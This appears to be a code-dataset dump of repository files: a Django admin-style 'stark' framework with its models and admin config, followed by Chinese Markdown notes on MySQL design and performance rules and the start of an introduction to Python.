form.is_valid():\n obj = form.save()\n pop_res_id = request.GET.get(\"pop_res_id\")\n if pop_res_id:\n res = {\"pk\": obj.pk, \"text\": str(obj), \"pop_res_id\": pop_res_id}\n return render(request, \"pop.html\", {\"res\": res})\n else:\n return redirect(self.get_list_url())\n else:\n return render(request, \"add_index.html\", locals())\n\n def delete(self, request, id):\n del_obj = self.model.objects.filter(nid=id).first()\n if request.method == \"GET\":\n list_url = self.get_list_url()\n # 为什么要确认页面,是因为重要数据需要二次确认,防止误删\n return render(request, \"del_index.html\", locals())\n else:\n del_obj.delete()\n return redirect(self.get_list_url())\n\n # 编辑页面\n def change(self, request, id):\n form = self.get_modelfrom_class()\n obj = self.model.objects.filter(pk=id).first()\n if request.method == \"GET\":\n form = form(instance=obj)\n return render(request, \"change_index.html\", locals())\n else:\n form = form(data=request.POST, instance=obj)\n if form.is_valid():\n form.save()\n return redirect(self.get_list_url())\n else:\n return render(request, \"change_index.html\", locals())\n\n def get_urls_2(self):\n temp = []\n model_name = self.model._meta.model_name # 当前模型表\n app_label = self.model._meta.app_label # 当前app\n\n temp.append(url(r\"^add/$\", self.add, name=\"%s_%s_add\" % (app_label, model_name)))\n temp.append(url(r\"^(\\d+)/delete/$\", self.delete, name=\"%s_%s_delete\" % (app_label, model_name)))\n temp.append(url(r\"^(\\d+)/change/$\", self.change, name=\"%s_%s_change\" % (app_label, model_name)))\n temp.append(url(r\"^$\", self.change_list, name=\"%s_%s_list\" % (app_label, model_name)))\n return temp\n\n @property\n def urls_2(self):\n return self.get_urls_2(), None, None # [], None, None\n\n\nclass ChangeList(object):\n def __init__(self, config, request, queryset):\n self.config = config\n self.request = request\n self.queryset = queryset\n\n from starkapp.util.paginator import Pagination\n current_page = 
request.GET.get(\"page\")\n all_count = self.queryset.count()\n base_url = self.request.path_info\n params = self.request.GET\n paginator = Pagination(current_page, all_count, base_url, params)\n data_list = self.queryset[paginator.start: paginator.end]\n self.paginator = paginator\n self.data_list = data_list\n # actions 批量操作的动作\n self.actions = self.config.get_actions()\n # filter 过滤的字段\n self.list_filter = self.config.list_filter\n\n def get_filter_link_tag(self):\n link_list = {}\n data = self.request.GET\n import copy\n params = copy.deepcopy(data)\n for filter_field_name in self.config.list_filter:\n # 为什么放里面而不是放外面\n data = self.request.GET\n import copy\n params = copy.deepcopy(data)\n\n current_id = self.request.GET.get(filter_field_name, 0)\n filter_field_obj = self.config.model._meta.get_field(filter_field_name)\n # filter_field = FilterField(filter_field_name, filter_field_obj, self)\n if isinstance(filter_field_obj, ManyToManyField) or isinstance(filter_field_obj, ForeignKey):\n data_list = filter_field_obj.related_model.objects.all()\n else:\n data_list = self.config.model.objects.values_list(\"pk\", filter_field_name)\n temp = []\n # 处理全部标签\n if params.get(filter_field_name, None):\n del params[filter_field_name]\n temp.append(\"<a href='?%s'>全部</a>\" % (params.urlencode()))\n else:\n temp.append(\"<a class='active' href='?%s'>全部</a>\" % (params.urlencode()))\n # 处理数据标签\n for obj in data_list:\n if isinstance(filter_field_obj, ManyToManyField) or isinstance(filter_field_obj, ForeignKey):\n pk, text = obj.pk, str(obj)\n params[filter_field_name] = pk\n else:\n pk, text = obj\n params[filter_field_name] = text\n _url = params.urlencode()\n if current_id == str(pk) or current_id == text:\n link_tag = \"<a class='active' href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n else:\n link_tag = \"<a href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n temp.append(link_tag)\n link_list[filter_field_name] = temp\n # ff = FilterField(self.config, self.request)\n # link_list = ff.get_filter_link()\n return link_list\n\n def handler_action(self):\n temp = []\n for action in self.actions:\n temp.append({\"name\": action.__name__, \"desc\": action.desc if getattr(action, \"desc\", None) else action.__name__})\n return temp\n\n def get_header(self):\n header_list = []\n # 这里的代码是处理表头数据的\n for field in self.config.get_list_display:\n if callable(field):\n val = field(self.config, is_header=True)\n header_list.append(val)\n else:\n if field == \"__str__\":\n header_list.append(self.config.model._meta.model_name.upper())\n else:\n field_obj = self.config.model._meta.get_field(field)\n header_list.append(field_obj.verbose_name)\n return header_list\n\n def get_body(self):\n data_list = self.data_list\n new_data_list = []\n # 这里才是我们数据库中的数据\n for obj in data_list:\n temp = []\n for field in self.config.get_list_display:\n if callable(field):\n val = field(self.config, obj)\n else:\n try:\n field_obj = self.config.model._meta.get_field(field)\n # 对于多对多字段的现实进行处理\n if isinstance(field_obj, ManyToManyField):\n val = getattr(obj, field).all()\n val = \",\".join([str(item) for item in val])\n else:\n val = getattr(obj, field)\n # 如果有list_display_link,就把他编程a标签\n if field in self.config.list_display_link:\n val = mark_safe(\"<a href=%s>%s</a>\" % (reverse(self.config.get_edit_url(obj), args=(obj.pk,)), val))\n except Exception as e:\n val = getattr(obj, field)\n temp.append(val)\n new_data_list.append(temp)\n return new_data_list\n\n\n# 针对((),()),[[],[]]数据类型构建a标签\n\"\"\"class LinkTagGen(object):\n def __init__(self, 
data, filter_field, request):\n self.data = data\n self.filter_field = filter_field\n self.request = request\n\n def __iter__(self):\n current_id = self.request.GET.get(self.filter_field.filter_field_name, 0)\n params = copy.deepcopy(self.request.GET)\n params._mutable = True\n if params.get(self.filter_field.filter_field_name):\n del params[self.filter_field.filter_field_name]\n _url = \"%s?%s\" % (self.request.path_info, params.urlencode())\n yield mark_safe(\"<a href='%s'>全部</a>\" % _url)\n else:\n _url = \"%s?%s\" % (self.request.path_info, params.urlencode())\n yield mark_safe(\"<a href='%s' class='active'>全部</a>\" % _url)\n for item in self.data:\n if self.filter_field.filter_field_obj.choices:\n pk, text = str(item[0], item[1])\n elif isinstance(self.filter_field.filter_field_obj, ForeignKey) or \\\n isinstance(self.filter_field.filter_field_obj, ManyToManyField):\n pk, text = str(item.pk), item\n else:\n pk, text = item[1], item[1]\n params[self.filter_field.filter_field_name] = pk\n _url = \"%s?%s\" % (self.request.path_info, params.urlencode())\n if current_id == pk:\n link_tag = \"<a href='%s' class='active'>%s</a>\" % (_url, text)\n else:\n link_tag = \"<a href='%s'>%s</a>\" % (_url, text)\n yield mark_safe(link_tag)\"\"\"\n\n\n# 为每一个过滤的字段封装成整体类\nclass FilterField(object):\n def __init__(self, config, request):\n self.config = config\n self.request = request\n\n def get_data(self):\n if isinstance(self.filter_field_obj, ForeignKey) or isinstance(self.filter_field_obj, ManyToManyField):\n return self.filter_field_obj.related_model.objects.all()\n elif self.filter_field_obj.choices:\n return self.filter_field_obj.choices\n else:\n return self.config.model.objects.values_list(\"pk\", self.filter_field_name)\n\n def get_params(self):\n data = self.request.GET\n import copy\n params = copy.deepcopy(data)\n return params\n\n def get_filter_link(self):\n link_list = {}\n for filter_field_name in self.config.list_filter:\n self.filter_field_name = filter_field_name\n # 为什么放里面而不是放外面\n params = self.get_params()\n current_id = self.get_current_id()\n self.get_filter_field_obj()\n temp = self.get_link_list(params, current_id)\n link_list[filter_field_name] = temp\n return link_list\n\n def get_current_id(self):\n current_id = self.request.GET.get(self.filter_field_name, 0)\n return current_id\n\n def get_filter_field_obj(self):\n filter_field_obj = self.config.model._meta.get_field(self.filter_field_name)\n self.filter_field_obj = filter_field_obj\n\n def get_link_list(self, params, current_id):\n data_list = self.get_data()\n temp = []\n temp = self.deal_all_tag(params, temp)\n temp = self.deal_data_tag(params, data_list, current_id, temp)\n return temp\n\n def deal_data_tag(self, params, data_list, current_id, temp):\n for obj in data_list:\n pk, text, params = self.get_pk_text(params, obj)\n _url = params.urlencode()\n if current_id == str(pk) or current_id == text:\n link_tag = \"<a class='active' href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n else:\n link_tag = \"<a href='?%s'>%s</a>\" % (_url, text) # %s/%s/\n temp.append(link_tag)\n return temp\n\n def get_pk_text(self, params, obj):\n if isinstance(self.filter_field_obj, ManyToManyField) or isinstance(self.filter_field_obj, ForeignKey):\n pk, text = obj.pk, str(obj)\n params[self.filter_field_name] = pk\n else:\n pk, text = obj\n params[self.filter_field_name] = text\n return pk, text, params\n\n def deal_all_tag(self, params, temp):\n if params.get(self.filter_field_name, None):\n del params[self.filter_field_name]\n 
temp.append(\"<a href='?%s'>全部</a>\" % (params.urlencode()))\n else:\n temp.append(\"<a class='active' href='?%s'>全部</a>\" % (params.urlencode()))\n return temp\n\n\nclass StarkSite(object):\n\n def __init__(self):\n self._registry = {}\n\n def register(self, model, stark_class=None, **options):\n if not stark_class:\n # 如果注册的时候没有自定义配置类,执行\n stark_class = ModelStark # 配置类\n\n # 降配置类对象加到_registry字典中,建立模型类\n self._registry[model] = stark_class(model, self) # _registry={'model':stark_class(model)}\n\n def get_urls(self):\n \"\"\"构造一层url\"\"\"\n temp = []\n for model, stark_class_obj in self._registry.items():\n # model:一个模型表\n # stark_class_obj:当前模型表相应的配置类对象\n model_name = model._meta.model_name\n app_label = model._meta.app_label\n # 分发增删改查url,问什么要是用stark_class_obj.urls_2,因为我们需要使用每个类定制的内容,如list_display\n # 如果将urls_2还是放入StarkSite中那么,每个模型的现实都是一样的,我们根本没有用到定制显示的参数\n temp.append(url(r\"^%s/%s/\" % (app_label, model_name), stark_class_obj.urls_2))\n \"\"\"\n path('app01/user/',UserConfig(User,site).urls2),\n path('app01/book/',ModelStark(Book,site).urls2),\n \"\"\"\n return temp\n\n @property\n def urls(self):\n return self.get_urls(), None, None\n\n\nsite = StarkSite()\n"
},
{
"alpha_fraction": 0.6546929478645325,
"alphanum_fraction": 0.6662803888320923,
"avg_line_length": 29.821428298950195,
"blob_id": "3ee9adc36b6ddbd14b2c974ca8440e17f9aff11d",
"content_id": "1dd9582431c31f61b9d2f99ca7e9ad3617beca52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 965,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 28,
"path": "/app01/admin.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom app01.models import *\n\n\nclass BookConfig(admin.ModelAdmin):\n list_display = [\"nid\", \"title\", \"price\", \"publishDate\"] # 定制显示那些列,不能放多对多\n list_display_links = [\"title\"] # 查看链接\n # list_filter = [\"title\", \"publishDate\", \"authors\"] # 过滤\n list_editable = [\"price\"] # 编辑\n search_fields = [\"title\", \"price\"] # 搜索字段\n # date_hierarchy = \"publishDate\"\n fields = (\"title\",) # 限定现实的字段\n exclude = (\"\",) # 不显示哪些字段,和fields相反\n ordering = (\"nid\",) # 排序\n\n def patch_action(self, request, queryset):\n queryset.update(publishDate=\"2019-11-22\")\n\n patch_action.short_description = \"批量初始化\"\n actions = [patch_action]\n\n\nfrom django.contrib.admin.sites import AdminSite\n\nadmin.site.register(Book, BookConfig)\nadmin.site.register(Author)\nadmin.site.register(AuthorDetail)\nadmin.site.register(Publish)\n"
},
{
"alpha_fraction": 0.6351791620254517,
"alphanum_fraction": 0.6482084393501282,
"avg_line_length": 18.1875,
"blob_id": "5a5c03053146ad105b4769acb7c36c234f66db8b",
"content_id": "1ff8297b6f6ef7b4966d7862f4ae369eb728d738",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 307,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 16,
"path": "/starkapp/models.py",
"repo_name": "maxhope8/stark",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass UserInfo(models.Model):\n name = models.CharField(max_length=32)\n age = models.IntegerField()\n\n def __str__(self):\n return self.name\n\n\nclass Book(models.Model):\n title = models.CharField(max_length=32)\n\n def __str__(self):\n return self.title\n"
}
] | 5 |
xiaofengyvan/PythonGuide
|
https://github.com/xiaofengyvan/PythonGuide
|
572c43abb970920d888d3885e6100ffdc184253e
|
437e8183c5ead3677669e239ab91a256d894dd3f
|
92be75f3e475991a0bea5ef5be9877387b8ae2ba
|
refs/heads/main
| 2023-08-22T15:36:10.134229 | 2021-05-15T04:45:01 | 2021-05-15T04:45:01 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7734770178794861,
"alphanum_fraction": 0.8043362498283386,
"avg_line_length": 14.89217758178711,
"blob_id": "9c249f75fce4136009d809571ba4360c38f1651c",
"content_id": "ad3df2681b95d6fbe97af8bdc24ce71af1826387",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 17308,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 473,
"path": "/docs/MySQL高性能优化规范建议.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# 数据库命令规范\n\n1. 所有数据库对象名称必须使用小写字母并用下划线分割\n2. 所有数据库对象名称禁止使用mysql保留关键字(如果表名中包含关键字查询时,需要将其用单引号括起来)\n3. 数据库对象的命名要能做到见名识意,并且最后不要超过32个字符\n4. 临时库表必须以tmp_为前缀并以日期为后缀,备份表必须以bak_为前缀并以日期(时间戳)为后缀\n5. 所有存储相同数据的列名和列类型必须一致(一般作为关联列,如果查询时关联列类型不一致会自动进行数据类型隐式转换,会造成列上的索引失效,导致查询效率降低)\n\n# 数据库基本设计规范\n\n## 1. 所有表必须使用Innodb存储引擎\n\n\n\n```\n没有特殊要求(即Innodb无法满足的功能如:列存储,存储空间数据等)的情况下,所有表必须使用Innodb存储引擎(mysql5.5之前默认使用Myisam,5.6以后默认的为Innodb)\nInnodb 支持事务,支持行级锁,更好的恢复性,高并发下性能更好\n```\n\n## 2. 数据库和表的字符集统一使用UTF8\n\n\n\n```\n兼容性更好,统一字符集可以避免由于字符集转换产生的乱码,不同的字符集进行比较前需要进行转换会造成索引失效,如果数据库中有存储emoji表情的需要,字符集需要采用utf8mb4字符集\n```\n\n## 3. 所有表和字段都需要添加注释\n\n\n\n```\n使用comment从句添加表和列的备注\n从一开始就进行数据字典的维护\n```\n\n## 4. 尽量控制单表数据量的大小,建议控制在500万以内\n\n500万并不是Mysql数据库的限制,过大会造成修改表结构,备份,恢复都会有很大的问题\n可以用历史数据归档(应用于日志数据),分库分表(应用于业务数据)等手段来控制数据量大小\n\n## 5. 谨慎使用Mysql分区表\n\n\n\n```\n分区表在物理上表现为多个文件,在逻辑上表现为一个表\n谨慎选择分区键,跨分区查询效率可能更低\n建议采用物理分表的方式管理大数据\n```\n\n## 6. 尽量做到冷热数据分离,减小表的宽度\n\n\n\n```\nMysql限制每个表最多存储4096列,并且每一行数据的大小不能超过65535字节\n\n减少磁盘IO,保证热数据的内存缓存命中率(表越宽,把表装载进内存缓冲池时所占用的内存也就越大,也会消耗更多的IO)\n更有效的利用缓存,避免读入无用的冷数据\n经常一起使用的列放到一个表中(避免更多的关联操作)\n```\n\n## 7. 禁止在表中建立预留字段\n\n\n\n```\n预留字段的命名很难做到见名识义\n预留字段无法确认存储的数据类型,所以无法选择合适的类型\n对预留字段类型的修改,会对表进行锁定\n```\n\n## 8. 禁止在数据库中存储图片,文件等大的二进制数据\n\n\n\n```\n通常文件很大,会短时间内造成数据量快速增长,数据库进行数据库读取时,通常会进行大量的随机IO操作,文件很大时,IO操作很耗时\n通常存储于文件服务器,数据库只存储文件地址信息\n```\n\n## 9. 禁止在线上做数据库压力测试\n\n## 10. 禁止从开发环境,测试环境直接连接生成环境数据库\n\n# 数据库字段设计规范\n\n## 1. 优先选择符合存储需要的最小的数据类型\n\n\n\n```\n原因是:列的字段越大,建立索引时所需要的空间也就越大,这样一页中所能存储的索引节点的数量也就越少也越少,在遍历时所需要的IO次数也就越多,\n索引的性能也就越差\n方法:\n```\n\n- 将字符串转换成数字类型存储,如:将IP地址转换成整形数据\n\nmysql提供了两个方法来处理ip地址\n\ninet_aton 把ip转为无符号整型(4-8位)\ninet_ntoa 把整型的ip转为地址\n\n插入数据前,先用inet_aton把ip地址转为整型,可以节省空间\n显示数据时,使用inet_ntoa把整型的ip地址转为地址显示即可。\n\n- 对于非负型的数据(如自增ID、整型IP)来说,要优先使用无符号整型来存储\n\n因为:无符号相对于有符号可以多出一倍的存储空间\nSIGNED INT -2147483648~2147483647\nUNSIGNED INT 0~4294967295\n\nVARCHAR(N)中的N代表的是字符数,而不是字节数\n使用UTF8存储255个汉字 Varchar(255)=765个字节\n\n过大的长度会消耗更多的内存\n\n## 2. 避免使用TEXT、BLOB数据类型,最常见的TEXT类型可以存储64k的数据\n\n- 建议把BLOB或是TEXT列分离到单独的扩展表中\n\nMysql内存临时表不支持TEXT、BLOB这样的大数据类型,如果查询中包含这样的数据,在排序等操作时,就不能使用内存临时表,必须使用磁盘临时表进行\n而且对于这种数据,Mysql还是要进行二次查询,会使sql性能变得很差,但是不是说一定不能使用这样的数据类型\n\n如果一定要使用,建议把BLOB或是TEXT列分离到单独的扩展表中,查询时一定不要使用select * 而只需要取出必要的列,不需要TEXT列的数据时不要对该列进行查询\n\n- TEXT或BLOB类型只能使用前缀索引\n\n因为MySQL对索引字段长度是有限制的,所以TEXT类型只能使用前缀索引,并且TEXT列上是不能有默认值的\n\n## 3. 避免使用ENUM类型\n\n修改ENUM值需要使用ALTER语句\nENUM类型的ORDER BY操作效率低,需要额外操作\n禁止使用数值作为ENUM的枚举值\n\n## 4. 尽可能把所有列定义为NOT NULL\n\n原因:\n索引NULL列需要额外的空间来保存,所以要占用更多的空间\n进行比较和计算时要对NULL值做特别的处理\n\n## 5. 使用TIMESTAMP(4个字节)或DATETIME类型(8个字节)存储时间\n\nTIMESTAMP 存储的时间范围 1970-01-01 00:00:01 ~ 2038-01-19-03:14:07\nTIMESTAMP 占用4字节和INT相同,但比INT可读性高\n超出TIMESTAMP取值范围的使用DATETIME类型存储\n\n经常会有人用字符串存储日期型的数据(不正确的做法)\n缺点1:无法用日期函数进行计算和比较\n缺点2:用字符串存储日期要占用更多的空间\n\n## 6. 同财务相关的金额类数据必须使用decimal类型\n\n- 非精准浮点:float,double\n- 精准浮点:decimal\n\nDecimal类型为精准浮点数,在计算时不会丢失精度\n占用空间由定义的宽度决定,每4个字节可以存储9位数字,并且小数点要占用一个字节\n可用于存储比bigint更大的整型数据\n\n# 索引设计规范\n\n## 1. 限制每张表上的索引数量,建议单张表索引不超过5个\n\n\n\n```\n索引并不是越多越好!索引可以提高效率同样可以降低效率\n\n索引可以增加查询效率,但同样也会降低插入和更新的效率,甚至有些情况下会降低查询效率\n\n因为mysql优化器在选择如何优化查询时,会根据统一信息,对每一个可以用到的索引来进行评估,以生成出一个最好的执行计划,如果同时有很多个\n索引都可以用于查询,就会增加mysql优化器生成执行计划的时间,同样会降低查询性能 \n```\n\n## 2. 禁止给表中的每一列都建立单独的索引\n\n\n\n```\n5.6版本之前,一个sql只能使用到一个表中的一个索引,5.6以后,虽然有了合并索引的优化方式,但是还是远远没有使用一个联合索引的查询方式好\n```\n\n## 3. 每个Innodb表必须有个主键\n\n\n\n```\nInnodb是一种索引组织表:数据的存储的逻辑顺序和索引的顺序是相同的\n每个表都可以有多个索引,但是表的存储顺序只能有一种\nInnodb是按照主键索引的顺序来组织表的\n\n不要使用更新频繁的列作为主键,不适用多列主键(相当于联合索引)\n不要使用UUID,MD5,HASH,字符串列作为主键(无法保证数据的顺序增长)\n主键建议使用自增ID值\n```\n\n# 常见索引列建议\n\n1. 出现在SELECT、UPDATE、DELETE语句的WHERE从句中的列\n\n2. 
包含在ORDER BY、GROUP BY、DISTINCT中的字段\n\n   并不是要将符合1和2中的字段的列都单独建立索引, 通常将1、2中的字段建立联合索引效果更好\n\n3. 多表join的关联列\n\n# 如何选择索引列的顺序\n\n\n\n```\n建立索引的目的是:希望通过索引进行数据查找,减少随机IO,增加查询性能,索引能过滤出越少的数据,则从磁盘中读入的数据也就越少\n```\n\n1. 区分度最高的放在联合索引的最左侧(区分度=列中不同值的数量/列的总行数)\n2. 尽量把字段长度小的列放在联合索引的最左侧(因为字段长度越小,一页能存储的数据量越大,IO性能也就越好)\n3. 使用最频繁的列放到联合索引的左侧(这样可以比较少的建立一些索引)\n\n# 避免建立冗余索引和重复索引(增加了查询优化器生成执行计划的时间)\n\n\n\n```\n重复索引示例:primary key(id)、index(id)、unique index(id)\n冗余索引示例:index(a,b,c)、index(a,b)、index(a)\n```\n\n# 对于频繁的查询优先考虑使用覆盖索引\n\n覆盖索引:就是包含了所有查询字段(where,select,order by,group by包含的字段)的索引\n\n覆盖索引的好处:\n\n1. 避免Innodb表进行索引的二次查询\n\nInnodb是以聚集索引的顺序来存储的,对于Innodb来说,二级索引在叶子节点中所保存的是行的主键信息,\n如果是用二级索引查询数据的话,在查找到相应的键值后,还要通过主键进行二次查询才能获取我们真实所需要的数据\n而在覆盖索引中,二级索引的键值中可以获取所有的数据,避免了对主键的二次查询,减少了IO操作,提升了查询效率\n\n2. 可以把随机IO变成顺序IO加快查询效率\n\n由于覆盖索引是按键值的顺序存储的,对于IO密集型的范围查找来说,对比随机从磁盘读取每一行的数据IO要少的多,\n因此利用覆盖索引在访问时也可以把磁盘的随机读取的IO转变成索引查找的顺序IO\n\n# 索引SET规范\n\n## 尽量避免使用外键约束\n\n不建议使用外键约束(foreign key),但一定要在表与表之间的关联键上建立索引\n外键可用于保证数据的参照完整性,但建议在业务端实现\n外键会影响父表和子表的写操作从而降低性能\n\n# 数据库SQL开发规范\n\n## 1. 建议使用预编译语句进行数据库操作\n\n\n\n```\n预编译语句可以重复使用执行计划,减少SQL编译所需要的时间,还可以解决动态SQL所带来的SQL注入的问题\n只传参数,比传递SQL语句更高效\n相同语句可以一次解析,多次使用,提高处理效率\n```\n\n## 2. 避免数据类型的隐式转换\n\n\n\n```\n隐式转换会导致索引失效\n如: select name,phone from customer where id = '111';\n```\n\n## 3. 充分利用表上已经存在的索引\n\n### 避免使用双%号的查询条件\n\n如 a like '%123%',(如果无前置%,只有后置%,是可以用到列上的索引的)\n\n### 一个SQL只能利用到复合索引中的一列进行范围查询\n\n\n\n```\n如 有 a,b,c列的联合索引,在查询条件中有a列的范围查询,则在b,c列上的索引将不会被用到,\n在定义联合索引时,如果a列要用到范围查找的话,就要把a列放到联合索引的右侧\n```\n\n### 使用left join 或 not exists 来优化not in 操作\n\n\n\n```\n因为not in 也通常会使索引失效\n```\n\n## 4. 数据库设计时,应该要对以后的扩展进行考虑\n\n## 5. 程序连接不同的数据库使用不同的账号,禁止跨库查询\n\n\n\n```\n为数据库迁移和分库分表留出余地\n降低业务耦合度\n避免权限过大而产生的安全风险\n```\n\n## 6. 禁止使用SELECT * 必须使用SELECT <字段列表> 查询\n\n\n\n```\n原因:\n 消耗更多的CPU和IO以及网络带宽资源\n 无法使用覆盖索引\n 可减少表结构变更带来的影响\n```\n\n## 7. 禁止使用不含字段列表的INSERT语句\n\n\n\n```\n如: insert into values ('a','b','c');\n应使用 insert into t(c1,c2,c3) values ('a','b','c');\n```\n\n## 8. 避免使用子查询,可以把子查询优化为join操作\n\n\n\n```\n通常子查询在in子句中,且子查询中为简单SQL(不包含union、group by、order by、limit从句)时,才可以把子查询转化为关联查询进行优化\n\n子查询性能差的原因:\n\n 子查询的结果集无法使用索引,通常子查询的结果集会被存储到临时表中,不论是内存临时表还是磁盘临时表都不会存在索引,所以查询性能会受到一定的影响\n 特别是对于返回结果集比较大的子查询,其对查询性能的影响也就越大\n 由于子查询会产生大量的临时表也没有索引,所以会消耗过多的CPU和IO资源,产生大量的慢查询\n```\n\n## 9. 避免使用JOIN关联太多的表\n\n\n\n```\n对于Mysql来说,是存在关联缓存的,缓存的大小可以由join_buffer_size参数进行设置\n在Mysql中,对于同一个SQL多关联(join)一个表,就会多分配一个关联缓存,如果在一个SQL中关联的表越多,\n所占用的内存也就越大\n\n如果程序中大量的使用了多表关联的操作,同时join_buffer_size设置的也不合理的情况下,就容易造成服务器内存溢出的情况,\n就会影响到服务器数据库性能的稳定性\n\n同时对于关联操作来说,会产生临时表操作,影响查询效率\nMysql最多允许关联61个表,建议不超过5个\n```\n\n## 10. 减少同数据库的交互次数\n\n\n\n```\n数据库更适合处理批量操作\n合并多个相同的操作到一起,可以提高处理效率\n```\n\n## 11. 对同一列进行or判断时,使用in代替or\n\n\n\n```\nin 的值不要超过500个\nin 操作可以更有效的利用索引,or大多数情况下很少能利用到索引\n```\n\n## 12. 禁止使用order by rand() 进行随机排序\n\n\n\n```\n会把表中所有符合条件的数据装载到内存中,然后在内存中对所有数据根据随机生成的值进行排序,并且可能会对每一行都生成一个随机值,如果满足条件的数据集非常大,\n就会消耗大量的CPU和IO及内存资源\n推荐在程序中获取一个随机值,然后从数据库中获取数据的方式\n```\n\n## 13. WHERE从句中禁止对列进行函数转换和计算\n\n\n\n```\n对列进行函数转换或计算时会导致无法使用索引\n\n不推荐:\nwhere date(create_time)='20190101'\n推荐:\nwhere create_time >= '20190101' and create_time < '20190102'\n```\n\n## 14. 在明显不会有重复值时使用UNION ALL 而不是UNION\n\n\n\n```\nUNION 会把两个结果集的所有数据放到临时表中后再进行去重操作\nUNION ALL 不会再对结果集进行去重操作\n```\n\n## 15. 拆分复杂的大SQL为多个小SQL\n\n\n\n```\n大SQL:逻辑上比较复杂,需要占用大量CPU进行计算的SQL\nMySQL 一个SQL只能使用一个CPU进行计算\nSQL拆分后可以通过并行执行来提高处理效率\n```\n\n# 数据库操作行为规范\n\n## 超100万行的批量写(UPDATE、DELETE、INSERT)操作,要分批多次进行操作\n\n### 1. 大批量操作可能会造成严重的主从延迟\n\n主从环境中,大批量操作可能会造成严重的主从延迟,大批量的写操作一般都需要执行一定长的时间,\n而只有当主库上执行完成后,才会在其他从库上执行,所以会造成主库与从库长时间的延迟情况\n\n### 2. 
binlog日志为row格式时会产生大量的日志\n\n大批量写操作会产生大量日志,特别是对于row格式二进制数据而言,由于在row格式中会记录每一行数据的修改,我们一次修改的数据越多,\n产生的日志量也就会越多,日志的传输和恢复所需要的时间也就越长,这也是造成主从延迟的一个原因\n\n### 3. 避免产生大事务操作\n\n大批量修改数据,一定是在一个事务中进行的,这就会造成表中大批量数据进行锁定,从而导致大量的阻塞,阻塞会对MySQL的性能产生非常大的影响\n特别是长时间的阻塞会占满所有数据库的可用连接,这会使生产环境中的其他应用无法连接到数据库,因此一定要注意大批量写操作要进行分批\n\n## 对于大表使用pt-online-schema-change修改表结构\n\n1. 避免大表修改产生的主从延迟\n2. 避免在对表字段进行修改时进行锁表\n\n对大表数据结构的修改一定要谨慎,会造成严重的锁表操作,尤其是生产环境,是不能容忍的\n\npt-online-schema-change它会首先建立一个与原表结构相同的新表,并且在新表上进行表结构的修改,然后再把原表中的数据复制到新表中,并在原表中增加一些触发器\n把原表中新增的数据也复制到新表中,在行所有数据复制完成之后,把新表命名成原表,并把原来的表删除掉\n把原来一个DDL操作,分解成多个小的批次进行\n\n## 禁止为程序使用的账号赋予super权限\n\n\n\n```\n当达到最大连接数限制时,还运行1个有super权限的用户连接\nsuper权限只能留给DBA处理问题的账号使用\n```\n\n## 对于程序连接数据库账号,遵循权限最小原则\n\n\n\n```\n程序使用数据库账号只能在一个DB下使用,不准跨库\n程序使用的账号原则上不准有drop权限\n```\n\n> 原文链接:https://www.cnblogs.com/huchong/p/10219318.html\n>\n> 作者:**[听风。](https://www.cnblogs.com/huchong/p/10219318.html)**\n\n"
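上文建议"将字符串转换成数字类型存储,如:将IP地址转换成整形数据",并给出了 MySQL 的 inet_aton/inet_ntoa;如果想把这一步转换放到应用层完成,也可以用 Python 实现等价的转换(下面只是一个最小示意,对应的列仍建议定义为 UNSIGNED INT):

```python
import socket
import struct


def ip2int(ip: str) -> int:
    """等价于 MySQL 的 INET_ATON():把点分十进制 IP 转成无符号整数"""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def int2ip(num: int) -> str:
    """等价于 MySQL 的 INET_NTOA():把无符号整数还原成点分十进制 IP"""
    return socket.inet_ntoa(struct.pack("!I", num))


print(ip2int("192.168.1.1"))  # 3232235777,入库前转换,节省存储空间
print(int2ip(3232235777))     # '192.168.1.1',展示时再还原
```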
},
{
"alpha_fraction": 0.6654024124145508,
"alphanum_fraction": 0.7209908962249756,
"avg_line_length": 18.395402908325195,
"blob_id": "12461153d35f3bb5654527f507a540fb42e6e5db",
"content_id": "39169f3099b0113c766d69766b902d60135fac99",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 15255,
"license_type": "permissive",
"max_line_length": 366,
"num_lines": 435,
"path": "/Python基础连载/认识Python.md",
"repo_name": "xiaofengyvan/PythonGuide",
"src_encoding": "UTF-8",
"text": "# Python连载系列:认识Python\n\n## 认识Python\n\n> 本章目录:\n\n+ Python简介-历史/优缺点\n+ 搭建编程环境\n+ 第一个Python程序\n+ 注释\n\n#### Python起源\n\n1. 1989 年的圣诞节期间,吉多·范罗苏姆为了在阿姆斯特丹打发时间,决心开发一个新的**解释程序**,作为 ABC 语言的一种继承(**感觉下什么叫牛人**)\n2. ABC 是由吉多参加设计的一种教学语言,就吉多本人看来,ABC 这种语言非常优美和强大,是**专门为非专业程序员设计的**。但是 ABC 语言并没有成功,究其原因,吉多认为是**非开放**造成的。吉多决心在 Python 中避免这一错误,并获取了非常好的效果\n3. 之所以选中 Python(蟒蛇) 作为程序的名字,是因为他是 BBC 电视剧——蒙提·派森的飞行马戏团(Monty Python's Flying Circus)的爱好者\n4. 1991 年,第一个 Python **解释器** 诞生,它是用 C 语言实现的,并能够调用 C 语言的库文件\n\n> 在这里我们要去了解一下什么是解析器\n\n\n\n- **编译型语言**:程序在执行之前需要一个专门的编译过程,把程序编译成为机器语言的文件,运行时不需要重新翻译,直接使用编译的结果就行了。程序执行效率高,依赖编译器,跨平台性差些。如 C、C++\n- **解释型语言**:解释型语言编写的程序不进行预先编译,以文本方式存储程序代码,会将代码一句一句直接运行。在发布程序时,看起来省了道编译工序,但是在运行程序的时候,必须先解释再运行\n\n#### 编译型语言和解释型语言对比\n\n- **速度** —— 